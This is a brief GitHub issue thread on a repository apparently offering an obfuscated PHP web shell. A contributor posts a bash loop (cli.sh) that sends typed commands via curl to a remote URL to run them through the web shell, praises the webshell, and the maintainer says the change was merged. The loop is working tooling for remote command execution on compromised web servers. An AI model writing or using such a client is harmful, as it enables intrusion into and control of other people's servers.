### ISSUE TITLE
Update bash cli to support encoding :)

### ISSUE THREAD

**Issue by maxiar** [bayufedra/simple-and-obfuscate-PHP-shell#1]
Hi! I updated the bash cli.sh to support curl request encoding:

cli.sh:
`while true;do read -p "[>] halah@wibu:~$ " cmd;curl -G $1 --data-urlencode "0=$cmd";done`

Thanks! you webshell is excelent!

**Comment by bayufedra** [comment]
Hi! I just added it and also added some content. sorry I just read the issue you opened up. thanks!
